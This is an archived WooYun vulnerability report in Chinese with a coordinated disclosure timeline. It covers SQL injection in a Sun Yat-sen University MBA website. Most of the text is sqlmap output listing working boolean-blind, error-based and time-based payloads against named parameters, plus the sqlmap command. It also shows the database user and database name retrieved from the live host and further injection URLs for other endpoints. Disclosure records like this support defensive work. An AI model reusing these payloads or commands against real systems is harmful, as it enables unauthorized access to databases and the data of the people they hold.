乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-11: 细节已通知厂商并且等待厂商处理中 2016-01-11: 厂商已经确认,细节仅向厂商公开 2016-01-21: 细节向核心白帽子及相关领域专家公开 2016-01-31: 细节向普通白帽子公开 2016-02-10: 细节向实习白帽子公开 2016-02-22: 细节向公众公开
一起打包了,多给点RANK吧。
注入点 http://mba.bus.sysu.edu.cn/site/project/3/16.html?first_char=W&first_char=L&job_title=2参数1:first_char参数2:job_title
Parameter: first_char (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: first_char=W&first_char=L' AND 5694=5694 AND 'AvDK'='AvDK&job_title=2 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: first_char=W&first_char=L' AND (SELECT 4453 FROM(SELECT COUNT(*),CONCAT(0x716a787071,(SELECT (ELT(4453=4453,1))),0x716a707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'epXZ'='epXZ&job_title=2 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: first_char=W&first_char=L' AND (SELECT * FROM (SELECT(SLEEP(5)))dkdz) AND 'EeHe'='EeHe&job_title=2Parameter: job_title (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: first_char=W&first_char=L&job_title=2 AND 1165=1165 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: first_char=W&first_char=L&job_title=2 AND (SELECT 6652 FROM(SELECT COUNT(*),CONCAT(0x716a787071,(SELECT (ELT(6652=6652,1))),0x716a707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: first_char=W&first_char=L&job_title=2 AND (SELECT * FROM (SELECT(SLEEP(5)))lvuL)---there were multiple injection points, please select the one to use for following injections:[0] place: GET, parameter: first_char, type: Single quoted string (default)[1] place: GET, parameter: job_title, type: Unescaped numeric[q] Quit> 0[16:00:48] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.4.9back-end DBMS: MySQL 5.0[16:00:48] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 346 times[16:00:48] [INFO] fetched data logged to text files under '/root/.sqlmap/output/mba.bus.sysu.edu.cn'[*] shutting down at 16:00:48
sqlmap -u "http://mba.bus.sysu.edu.cn/site/project/3/16.html?first_char=W&first_char=L&job_title=2" -p job_title --current-db --current-user
[16:07:04] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.4.9back-end DBMS: MySQL 5.0[16:07:04] [INFO] fetching current user[16:07:04] [WARNING] reflective value(s) found and filtering out[16:07:04] [INFO] retrieved: zsgy@localhostcurrent user: 'zsgy@localhost'[16:07:04] [INFO] fetching current database[16:07:04] [INFO] retrieved: zsbmcurrent database: 'zsbm'
http://mba.bus.sysu.edu.cn/site/project/3/16.html?first_char=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&sdept=8 http://mba.bus.sysu.edu.cn/site/project/3/16.html?first_char=L&job_title=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&sdept=8http://mba.bus.sysu.edu.cn/site/getmore?page=2&page=%5c index/[email protected]&email='and(select%201%20from(select%20count(*)%2cconcat((select%20concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(113)%2cCHAR(81)%2cCHAR(81)%2cCHAR(113)%2cCHAR(106)%2cCHAR(102)%2cCHAR(57)%2cCHAR(122))%20from%20information_schema.tables%20limit%200%2c1)%2cfloor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'
然后用WVS扫了一下,这里面的全是SQL注入
随便跑一个
过滤
危害等级:高
漏洞Rank:10
确认时间:2016-01-11 15:38
谢谢,我们立即处理。
暂无